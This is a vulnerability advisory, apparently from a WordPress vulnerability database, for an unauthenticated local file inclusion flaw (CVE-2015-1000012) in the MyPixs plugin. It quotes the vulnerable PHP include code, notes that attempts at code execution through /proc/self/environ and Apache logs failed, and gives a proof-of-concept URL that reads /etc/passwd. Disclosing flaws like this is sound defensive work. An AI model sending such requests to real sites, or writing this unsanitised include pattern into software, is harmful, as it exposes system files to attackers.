MyPixs <= 0.3 – Unauthenticated Local File Inclusion (LFI) | CVE 2015-1000012

Description

Plugin is still affected and has been closed.

Typical local file inclusion vulnerability:

from downloadpage.php:
<?php
$url = $_REQUEST["url"];
if ($url != "") {
include($url);
}
?>

I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log

include(): Failed opening '/proc/self/environ' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /usr/share/wordpress/wp-content/plugins/mypixs/mypixs/downloadpage.php on line 4

Proof of Concept

http://www.example.com/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd

Affects Plugins

mypixs

No known fix

References

CVE

CVE-2015-1000012

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

WPVDB ID

24b83ce5-e3b8-4262-b087-a2dfec014985

Timeline

Publicly Published

2015-09-15 (about 10 years ago)

Added

2015-09-18 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2022-08-03

Title

WPide < 3.0 - Admin+ Local File Inclusion

Published

2025-07-10

Title

Pro Bulk Watermark Plugin for WordPress <= 2.0 - Authenticated (Subscriber+) Path Traversal

Published

2026-02-03

Title

Code Explorer <= 1.4.6 - Authenticated (Administrator+) Arbitrary File Read via 'file' Parameter

Published

2025-09-30

Title

Taskbot < 6.5 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2025-06-30

Title

Aviation Weather from NOAA <= 0.7.2 - Authenticated (Subscriber+) Arbitrary File Deletion